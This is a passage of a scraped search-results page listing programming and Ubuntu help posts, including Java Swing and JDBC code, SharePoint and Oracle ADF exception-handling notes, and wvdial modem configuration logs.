Search Results

Search found 38690 results on 1548 pages for 'try catch throw'.

Page 71/1548 | < Previous Page | 67 68 69 70 71 72 73 74 75 76 77 78  | Next Page >

  • Using JDialog with Tabbed Pane to draw different pictures [migrated]

    - by Bryam Ulloa
    I am using NetBeans, and I have a class that extends to JDialog, inside that Dialog box I have created a Tabbed Pane. The Tabbed Pane contains 6 different tabs, with 6 different panels of course. What I want to do is when I click on the different tabs, a diagram is supposed to be drawn with the paint method. My question is how can I draw on the different panels with just one paint method in another class being called from the Dialog class? Here is my code for the Dialog class: package GUI; public class NewJDialog extends javax.swing.JDialog{ /** * Creates new form NewJDialog */ public NewJDialog(java.awt.Frame parent, boolean modal) { super(parent, modal); initComponents(); } /** * This method is called from within the constructor to initialize the form. * WARNING: Do NOT modify this code. The content of this method is always * regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code"> private void initComponents() { jTabbedPane1 = new javax.swing.JTabbedPane(); jPanel1 = new javax.swing.JPanel(); jPanel2 = new javax.swing.JPanel(); jPanel3 = new javax.swing.JPanel(); jPanel4 = new javax.swing.JPanel(); jPanel5 = new javax.swing.JPanel(); jPanel6 = new javax.swing.JPanel(); jPanel7 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jLabel2 = new javax.swing.JLabel(); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1); jPanel1.setLayout(jPanel1Layout); jPanel1Layout.setHorizontalGroup( jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 466, Short.MAX_VALUE) ); jPanel1Layout.setVerticalGroup( jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 242, Short.MAX_VALUE) ); jTabbedPane1.addTab("FCFS", jPanel1); javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2.setLayout(jPanel2Layout); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 466, Short.MAX_VALUE) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 242, Short.MAX_VALUE) ); jTabbedPane1.addTab("SSTF", jPanel2); javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3); jPanel3.setLayout(jPanel3Layout); jPanel3Layout.setHorizontalGroup( jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 466, Short.MAX_VALUE) ); jPanel3Layout.setVerticalGroup( jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 242, Short.MAX_VALUE) ); jTabbedPane1.addTab("LOOK", jPanel3); javax.swing.GroupLayout jPanel4Layout = new javax.swing.GroupLayout(jPanel4); jPanel4.setLayout(jPanel4Layout); jPanel4Layout.setHorizontalGroup( jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 466, Short.MAX_VALUE) ); jPanel4Layout.setVerticalGroup( jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 242, Short.MAX_VALUE) ); jTabbedPane1.addTab("LOOK C", jPanel4); javax.swing.GroupLayout jPanel5Layout = new javax.swing.GroupLayout(jPanel5); jPanel5.setLayout(jPanel5Layout); jPanel5Layout.setHorizontalGroup( jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 466, Short.MAX_VALUE) ); jPanel5Layout.setVerticalGroup( jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 242, Short.MAX_VALUE) ); jTabbedPane1.addTab("SCAN", jPanel5); javax.swing.GroupLayout jPanel6Layout = new javax.swing.GroupLayout(jPanel6); jPanel6.setLayout(jPanel6Layout); jPanel6Layout.setHorizontalGroup( jPanel6Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 466, Short.MAX_VALUE) ); jPanel6Layout.setVerticalGroup( jPanel6Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGap(0, 242, Short.MAX_VALUE) ); jTabbedPane1.addTab("SCAN C", jPanel6); getContentPane().add(jTabbedPane1, java.awt.BorderLayout.CENTER); jLabel1.setText("Distancia:"); jLabel2.setText("___________"); javax.swing.GroupLayout jPanel7Layout = new javax.swing.GroupLayout(jPanel7); jPanel7.setLayout(jPanel7Layout); jPanel7Layout.setHorizontalGroup( jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel7Layout.createSequentialGroup() .addGap(21, 21, 21) .addComponent(jLabel1) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel2) .addContainerGap(331, Short.MAX_VALUE)) ); jPanel7Layout.setVerticalGroup( jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel7Layout.createSequentialGroup() .addContainerGap() .addGroup(jPanel7Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel1) .addComponent(jLabel2)) .addContainerGap(15, Short.MAX_VALUE)) ); getContentPane().add(jPanel7, java.awt.BorderLayout.PAGE_START); pack(); }// </editor-fold> /** * @param args the command line arguments */ public static void main(String args[]) { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(NewJDialog.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(NewJDialog.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(NewJDialog.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(NewJDialog.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the dialog */ java.awt.EventQueue.invokeLater(new Runnable() { public void run() { NewJDialog dialog = new NewJDialog(new javax.swing.JFrame(), true); dialog.addWindowListener(new java.awt.event.WindowAdapter() { @Override public void windowClosing(java.awt.event.WindowEvent e) { System.exit(0); } }); dialog.setVisible(true); } }); } // Variables declaration - do not modify private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel2; private javax.swing.JPanel jPanel1; private javax.swing.JPanel jPanel2; private javax.swing.JPanel jPanel3; private javax.swing.JPanel jPanel4; private javax.swing.JPanel jPanel5; private javax.swing.JPanel jPanel6; private javax.swing.JPanel jPanel7; private javax.swing.JTabbedPane jTabbedPane1; // End of variables declaration } This is another class that I have created for the paint method: package GUI; import java.awt.Graphics; import javax.swing.JPanel; /** * * @author TOSHIBA */ public class Lienzo { private int width = 5; private int height = 5; private int y = 5; private int x = 0; private int x1 = 0; public Graphics Draw(Graphics g, int[] pistas) { //Im not sure if this is the correct way to do it //The diagram gets drawn according to values from an array //The array is not always the same thats why I used the different Panels for (int i = 0; i < pistas.length; i++) { x = pistas[i]; x1 = pistas[i + 1]; g.drawOval(x, y, width, height); g.drawString(Integer.toString(x), x, y); g.drawLine(x, y, x1, y); } return g; } } I hope you guys understand what I am trying to do with my program.

    Read the article

  • how to run conky from terminal?

    - by Esmail0022
    http://www.unixmen.com/configure-con...t-howto-conky/ in this link there are 11 steps to get conky , i did all of them but the terminal show this message: The program 'conky' can be found in the following packages: * conky-cli * conky-std Try: sudo apt-get install and i try type this but saw this message: ismail@ismail-ASUS:~$ sudo apt-get install conky [sudo] password for ismail: E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it? Can you help me?

    Read the article

  • "Unable to locate package" errors for all software

    - by Mohammad Hosain Safari
    My apt-get doesn't install any programs. I try to install programs with apt-get install but always it shows same error: unable to locate package. For example I try to install the xbmc media center; here's what happens: $ sudo apt-get install xbmc Reading package lists... Done Building dependency tree Reading state information... Done E: Unable to locate package xbmc I have updated my package list with sudo apt-get update.

    Read the article

  • Cannot reinstall Unity - Broken dependencies

    - by Pedro Sardinha U94410
    I've lost my Unity after sudo apt-get autoremove --purge unity-webapp and cleaned the system with Ubuntu Tweak. I try to install it, but I always get a warning of broken dependencies... I've added the Unity Team PPA, dist-upgrade, among other efforts. (same with Unity 2D) When I try to install ubuntu-desktop I get this: E: Unable to correct problems, you have held packages (hold) spoiled. Please help me! [Ubuntu 12.10]

    Read the article

  • SharePoint, HTTP Modules, and Page Validation

    - by Damon Armstrong
    Sometimes I really believe that SharePoint actively thwarts my attempts to get it to do what I want.  First you look at something and say, wow, that should work.  Then you realize it doesn’t.  Then you have an epiphany and see a workaround.  And when you almost have that work around working… well then SharePoint says no again.  Then it’s off on another whirl-wind adventure to find a work around for the workaround.  I had one of those issues today, but I think I finally got past the last roadblock. So, I was writing an HTTP module as a workaround for another problem.  Everything looked like it was working great because I had been slowly adding code into the HTTP module bit by bit in a prototyping effort.  Finally I put in the last bit of code in place… and I started to get an error: “The security validation for this page is invalid. Click Back in your Web browser, refresh the page, and try your operation again.” This is not an uncommon error – it normally occurs when you are updating an item on a GET request and you have not marked the web containing the item with AllowUnsafeUpdates.  One issue, however, is that I wasn’t updating anything in my code.  I was, however, getting an SPWeb object so I decided to set the AllowUnsafeUpdates property on it to true for good measure. Once that was in place, I ran it again… “The security validation for this page is invalid. Click Back in your Web browser, refresh the page, and try your operation again.” WTF?!?!  I really expected that setting the AllowUnsafeUpdates property on the SPWeb would fix the issue, but clearly that was not the case.  I have had occasion to disassemble some SharePoint code with .NET Reflector in the past, and one of the things SharePoint abuses a bit more than it should is the HttpContext.  One way to avoid this abuse is to clear out the HttpContext while your code runs and then set it back once you are done.  I tried this next, and everything worked out just like I had expected.  So, if you are building an HTTP Module for SharePoint and some code that you are running ends up giving you a security validation error, remember to try running that code with AllowUnsafeUpdates turned on and try running the code with the HttpContext nulled out (just remember to set it back after your code runs or else you’ll really jack things up).

    Read the article

  • java Finalize method call

    - by Rajesh Kumar J
    The following is my Class code import java.net.*; import java.util.*; import java.sql.*; import org.apache.log4j.*; class Database { private Connection conn; private org.apache.log4j.Logger log ; private static Database dd=new Database(); private Database(){ try{ log= Logger.getLogger(Database.class); Class.forName("com.mysql.jdbc.Driver"); conn=DriverManager.getConnection("jdbc:mysql://localhost/bc","root","root"); conn.setReadOnly(false); conn.setAutoCommit(false); log.info("Datbase created"); /*Class.forName("sun.jdbc.odbc.JdbcOdbcDriver"); conn=DriverManager.getConnection("jdbc:odbc:rmldsn"); conn.setReadOnly(false); conn.setAutoCommit(false);*/ } catch(Exception e){ log.info("Cant Create Connection"); } } public static Database getDatabase(){ return dd; } public Connection getConnection(){ return conn; } @Override protected void finalize()throws Throwable { try{ conn.close(); Runtime.getRuntime().gc(); log.info("Database Close"); } catch(Exception e){ log.info("Cannot be closed Database"); } finally{ super.finalize(); } } } This can able to Initialize Database Object only through getDatabase() method. The below is the program which uses the single Database connection for the 4 threads. public class Main extends Thread { public static int c=0; public static int start,end; private int lstart,lend; public static Connection conn; public static Database dbase; public Statement stmt,stmtEXE; public ResultSet rst; /** * @param args the command line arguments */ static{ dbase=Database.getDatabase(); conn=dbase.getConnection(); } Main(String s){ super(s); try{ stmt=conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE); start=end; lstart=start; end=end+5; lend=end; System.out.println("Start -" +lstart +" End-"+lend); } catch(Exception e){ e.printStackTrace(); } } @Override public void run(){ try{ URL url=new URL("http://localhost:8084/TestWeb/"); rst=stmt.executeQuery("SELECT * FROM bc.cdr_calltimestamp limit "+lstart+","+lend); while(rst.next()){ try{ rst.updateInt(2, 1); rst.updateRow(); conn.commit(); HttpURLConnection httpconn=(HttpURLConnection) url.openConnection(); httpconn.setDoInput(true); httpconn.setDoOutput(true); httpconn.setRequestProperty("Content-Type", "text/xml"); //httpconn.connect(); String reqstring="<?xml version=\"1.0\" encoding=\"US-ASCII\"?>"+ "<message><sms type=\"mt\"><destination messageid=\"PS0\"><address><number" + "type=\"international\">"+ rst.getString(1) +"</number></address></destination><source><address>" + "<number type=\"unknown\"/></address></source><rsr type=\"success_failure\"/><ud" + "type=\"text\">Hello World</ud></sms></message>"; httpconn.getOutputStream().write(reqstring.getBytes(), 0, reqstring.length()); byte b[]=new byte[httpconn.getInputStream().available()]; //System.out.println(httpconn.getContentType()); httpconn.getInputStream().read(b); System.out.println(Thread.currentThread().getName()+new String(" Request"+rst.getString(1))); //System.out.println(new String(b)); httpconn.disconnect(); Thread.sleep(100); } catch(Exception e){ e.printStackTrace(); } } System.out.println(Thread.currentThread().getName()+" "+new java.util.Date()); } catch(Exception e){ e.printStackTrace(); } } public static void main(String[] args) throws Exception{ System.out.println(new java.util.Date()); System.out.println("Memory-before "+Runtime.getRuntime().freeMemory()); Thread t1=new Main("T1-"); Thread t2=new Main("T2-"); Thread t3=new Main("T3-"); Thread t4=new Main("T4-"); t1.start(); t2.start(); t3.start(); t4.start(); System.out.println("Memory-after "+Runtime.getRuntime().freeMemory()); } } I need to Close the connection after all the threads gets executed. Is there any good idea to do so. Kindly help me out in getting this work.

    Read the article

  • Filtering Your Content

    - by rickramsey
    Watch it directly on YouTube You can't always get what you want, but we do try to get you what you need. Use these OTN System Collections to see what's been published lately in your area of interest: Sysadmin Collection Developer Collection OTN ystems Collection See all collections (work in progress) If you prefer to use your RSS feeder, try this page: RSS Feeds for OTN Systems Content - Rick System Admin and Developer Community of OTN OTN Garage Blog OTN Garage on Facebook OTN Garage on Twitter

    Read the article

  • PASS Call for Speakers

    - by Paul Nielsen
    It's that time again - the PASS Summit 2010 (Seattle Nov 8-11) Call for Speakers is now open and accepting abstracts until June 5 th . personally, I'm on a pattern that on odd years I present what I'm excited about, and on even years I try try to proesent what I expect other are jazzed about, which takes a bit more work. Last year I offered to Coach any Pass Speakers for free and some success. I’m offering that service again startign with your abstracts. If you’d like me to review your abstracts...(read more)

    Read the article

  • How can I transfer output that appears on the console and format it so that it appears on a web page

    - by lojayna
    package collabsoft.backlog_reports.c4; import java.sql.CallableStatement; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; //import collabsoft.backlog_reports.c4.Report; public class Report { private Connection con; public Report(){ connectUsingJDBC(); } public static void main(String args[]){ Report dc = new Report(); dc.reviewMeeting(6, 8, 10); dc.createReport("dede",100); //dc.viewReport(100); // dc.custRent(3344,123,22,11-11-2009); } /** the following method is used to connect to the database **/ public void connectUsingJDBC() { // This is the name of the ODBC data source String dataSourceName = "Simple_DB"; try { // loading the driver in the memory Class.forName("sun.jdbc.odbc.JdbcOdbcDriver"); // This is the connection URL String dbURL = "jdbc:odbc:" + dataSourceName; con = DriverManager.getConnection("jdbc:mysql://localhost:3306/Collabsoft","root",""); // This line is used to print the name of the driver and it would throw an exception if a problem occured System.out.println("User connected using driver: " + con.getMetaData().getDriverName()); //Addcustomer(con,1111,"aaa","aaa","aa","aam","111","2222","111"); //rentedMovies(con); //executePreparedStatement(con); //executeCallableStatement(con); //executeBatch(con); } catch (Exception e) { e.printStackTrace(); } } /** *this code is to link the SQL code with the java for the task *as an admin I should be able to create a report of a review meeting including notes, tasks and users *i will take the task id and user id and note id that will be needed to be added in the review *meeting report and i will display the information related to these ida **/ public void reviewMeeting(int taskID, int userID, int noteID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL report_review_meeting(?,?,?)}"); callableStatement.setInt(1,taskID); callableStatement.setInt(2,userID); callableStatement.setInt(3,noteID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } ////////////////////////////////// ///////////////////////////////// public void allproject(int projID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL all_project(?)}"); callableStatement.setInt(1,projID); //callableStatement.setInt(2,userID); //callableStatement.setInt(3,noteID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } /////////////////////////////// /** * here i take the event id and i take a string report and then * i relate the report with the event **/ public void createReport(String report,int E_ID )// law el proc bt return table { try{ Statement st = con.createStatement(); st.executeUpdate("UPDATE e_vent SET e_vent.report=report WHERE e_vent.E_ID= E_ID;"); /* CallableStatement callableStatement = con.prepareCall("{CALL Create_report(?,?)}"); callableStatement.setString(1,report); callableStatement.setInt(2,E_ID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); }*/ } catch(Exception e) { System.out.println("E"); System.out.println(e); } } /** *in the following method i view the report of the event having the ID eventID **/ public void viewReport(int eventID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL view_report(?)}"); callableStatement.setInt(1,eventID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } } // the result of these methods is being showed on the console , i am using WIcket and i want it 2 be showed on the web how is that done ?!

    Read the article

  • Extending the ADF Controller exception handler

    - by frank.nimphius
    The Oracle ADF controller provides a declarative option for developers to define a view activity, method activity or router activity to handle exceptions in bounded or unbounded task flows. Exception handling however is for exceptions only and not handling all types of Throwable. Furthermore, exceptions that occur during the JSF RENDER RESPONSE phase are not looked at either as it is considered too late in the cycle. For developers to try themselves to handle unhandled exceptions in ADF Controller, it is possible to extend the default exception handling, while still leveraging the declarative configuration. To add your own exception handler: · Create a Java class that extends ExceptionHandler · Create a textfile with the name “oracle.adf.view.rich.context.Exceptionhandler” (without the quotes) and store it in .adf\META-INF\services (you need to create the “services” folder) · In the file, add the absolute name of your custom exception handler class (package name and class name without the “.class” extension) For any exception you don't handle in your custom exception handler, just re-throw it for the default handler to give it a try … import oracle.adf.view.rich.context.ExceptionHandler; public class MyCustomExceptionHandler extends ExceptionHandler { public MyCustomExceptionHandler() {      super(); } public void handleException(FacesContext facesContext,                              Throwable throwable, PhaseId phaseId)                              throws Throwable {    String error_message;    error_message = throwable.getMessage();    //check error message and handle it if you can    if( … ){          //handle exception        …    }    else{       //delegate to the default ADFc exception handler        throw throwable;}    } } Note however, that it is recommended to first try and handle exceptions with the ADF Controller default exception handling mechanism. In the past, I've seen attempts on OTN to handle regular application use cases with custom exception handlers for where there was no need to override the exception handler. So don't go for this solution to quickly and always think of alternative solutions. Sometimes a try-catch-final block does it better than sophisticated web exception handling.

    Read the article

  • i want to show the result of my code on a web page because it is being showed on a console??

    - by lojayna
    package collabsoft.backlog_reports.c4; import java.sql.CallableStatement; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; //import collabsoft.backlog_reports.c4.Report; public class Report { private Connection con; public Report(){ connectUsingJDBC(); } public static void main(String args[]){ Report dc = new Report(); dc.reviewMeeting(6, 8, 10); dc.createReport("dede",100); //dc.viewReport(100); // dc.custRent(3344,123,22,11-11-2009); } /** the following method is used to connect to the database **/ public void connectUsingJDBC() { // This is the name of the ODBC data source String dataSourceName = "Simple_DB"; try { // loading the driver in the memory Class.forName("sun.jdbc.odbc.JdbcOdbcDriver"); // This is the connection URL String dbURL = "jdbc:odbc:" + dataSourceName; con = DriverManager.getConnection("jdbc:mysql://localhost:3306/Collabsoft","root",""); // This line is used to print the name of the driver and it would throw an exception if a problem occured System.out.println("User connected using driver: " + con.getMetaData().getDriverName()); //Addcustomer(con,1111,"aaa","aaa","aa","aam","111","2222","111"); //rentedMovies(con); //executePreparedStatement(con); //executeCallableStatement(con); //executeBatch(con); } catch (Exception e) { e.printStackTrace(); } } /** *this code is to link the SQL code with the java for the task *as an admin I should be able to create a report of a review meeting including notes, tasks and users *i will take the task id and user id and note id that will be needed to be added in the review meeting report and i will display the information related to these ida */ public void reviewMeeting(int taskID, int userID, int noteID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL report_review_meeting(?,?,?)}"); callableStatement.setInt(1,taskID); callableStatement.setInt(2,userID); callableStatement.setInt(3,noteID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } ////////////////////////////////// ///////////////////////////////// public void allproject(int projID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL all_project(?)}"); callableStatement.setInt(1,projID); //callableStatement.setInt(2,userID); //callableStatement.setInt(3,noteID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } /////////////////////////////// /** * here i take the event id and i take a string report and then * i relate the report with the event **/ public void createReport(String report,int E_ID )// law el proc bt return table { try{ Statement st = con.createStatement(); st.executeUpdate("UPDATE e_vent SET e_vent.report=report WHERE e_vent.E_ID= E_ID;"); /* CallableStatement callableStatement = con.prepareCall("{CALL Create_report(?,?)}"); callableStatement.setString(1,report); callableStatement.setInt(2,E_ID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); }*/ } catch(Exception e) { System.out.println("E"); System.out.println(e); } } /** in the following method i view the report of the event having the ID eventID */ public void viewReport(int eventID)// law el proc bt return table { try{ CallableStatement callableStatement = con.prepareCall("{CALL view_report(?)}"); callableStatement.setInt(1,eventID); ResultSet resultSet = callableStatement.executeQuery(); // or executeupdate() or updateQuery ResultSetMetaData rsm = resultSet.getMetaData(); int numOfColumns = rsm.getColumnCount(); System.out.println("lojayna"); while (resultSet.next()) { System.out.println("New Row:"); for (int i = 1; i <= numOfColumns; i++) System.out.print(rsm.getColumnName(i) + ": " + resultSet.getObject(i) + " "); System.out.println(); } } catch(Exception e) { System.out.println("E"); } } } // the result of these methods is being showed on the console , i am using WIcket and i want it 2 be showed on the web how is that done ?! thnxxx

    Read the article

  • Ubuntu 10.04 LTS server update / upgrade issue

    - by user92603
    I have a starnge problem here with my Ubuntu 10.04 LTS server. When I try to update the server I got messages Err and warning, here an eg: sudo apt-get update Err http://fr.archive.ubuntu.com lucid Release.gpg W: Impossible de récupérer http://security.ubuntu.com/ubuntu/dists/lucid-security/multiverse/i18n/Translation-fr.bz2 Erreur temporaire de résolution de «*security.ubuntu.com*» but my server is connected and if I try to ping some DNS server (eg: 8.8.8.8 ) it works ! Can some one help me on that issue ?

    Read the article

  • Can't return to stock Android

    - by kurt
    Whenever I try and uncompress the tar file, I get this: tar (child): nakasi-jro03d-factory-e102ba72.tg: Cannot open: No such file or directory tar (child): Error is not recoverable: exiting now tar: Child returned status 2 tar: Error is not recoverable: exiting now I'm fairly new to Ubuntu. So I'm pretty sure that's my fault. So I just compress it manually using the GUI. But when I try to flash it, I get sudo: ./flash-all.sh: command not found Please help.

    Read the article

  • How to configure TATA Photon+ EC1261 HUAWEI

    - by user3215
    I'm running ubuntu 10.04. I have a newly purchased TATA Photon+ Internet connection which supports Windows and Mac. On the Internet I found a article saying that it could be configured on Linux. I followed the steps to install it on Ubuntu from this link. I am still not able to get online, and need some help. Also, it is very slow, but I was told that I would see speeds up to 3.1MB. I dont have wvdial installed and cannot install it from apt as I'm not connected to internet Booting from windows I dowloaded "wvdial" .deb package and tried to install on ubuntu but it's ended with dependency problem. Automatically, don't know how, I got connected to internet only for once. Immediately I installed wvdial package after this I followed the tutorials(I could not browse and upload the files here) . From then it's showing that the device is connected in the network connections but no internet connection. Once I disable the device, it won't show as connected again and I'll have to restart my system. Sometimes the device itself not detected(wondering if there is any command to re-read the all devices). output of wvdialconf /etc/wvdial.cof: #wvdialconf /etc/wvdial.conf Editing `/etc/wvdial.conf'. Scanning your serial ports for a modem. ttyS0<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud ttyS0<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 115200 baud ttyS0<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up. Modem Port Scan<*1>: S1 S2 S3 WvModem<*1>: Cannot get information for serial port. ttyUSB0<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud ttyUSB0<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud ttyUSB0<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up. WvModem<*1>: Cannot get information for serial port. ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up. WvModem<*1>: Cannot get information for serial port. ttyUSB2<*1>: ATQ0 V1 E1 -- OK ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: +GMI: HUAWEI TECHNOLOGIES CO., LTD ttyUSB2<*1>: Speed 9600: AT -- OK ttyUSB2<*1>: Max speed is 9600; that should be safe. ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK Found a modem on /dev/ttyUSB2. Modem configuration written to /etc/wvdial.conf. ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0" output of wvdial: #wvdial --> WvDial: Internet dialer version 1.60 --> Cannot get information for serial port. --> Initializing modem. --> Sending: ATZ ATZ OK --> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 OK --> Sending: AT+CRM=1 AT+CRM=1 OK --> Modem initialized. --> Sending: ATDT#777 --> Waiting for carrier. ATDT#777 CONNECT --> Carrier detected. Starting PPP immediately. --> Starting pppd at Sat Oct 16 15:30:47 2010 --> Pid of pppd: 5681 --> Using interface ppp0 --> pppd: (u;[08]@s;[08]`{;[08] --> pppd: (u;[08]@s;[08]`{;[08] --> pppd: (u;[08]@s;[08]`{;[08] --> pppd: (u;[08]@s;[08]`{;[08] --> pppd: (u;[08]@s;[08]`{;[08] --> pppd: (u;[08]@s;[08]`{;[08] --> local IP address 14.96.147.104 --> pppd: (u;[08]@s;[08]`{;[08] --> remote IP address 172.29.161.223 --> pppd: (u;[08]@s;[08]`{;[08] --> primary DNS address 121.40.152.90 --> pppd: (u;[08]@s;[08]`{;[08] --> secondary DNS address 121.40.152.100 --> pppd: (u;[08]@s;[08]`{;[08] Output of log message /var/log/messages: Oct 16 15:29:44 avyakta-desktop pppd[5119]: secondary DNS address 121.242.190.180 Oct 16 15:29:58 desktop pppd[5119]: Terminating on signal 15 Oct 16 15:29:58 desktop pppd[5119]: Connect time 0.3 minutes. Oct 16 15:29:58 desktop pppd[5119]: Sent 0 bytes, received 177 bytes. Oct 16 15:29:58 desktop pppd[5119]: Connection terminated. Oct 16 15:30:47 desktop pppd[5681]: pppd 2.4.5 started by root, uid 0 Oct 16 15:30:47 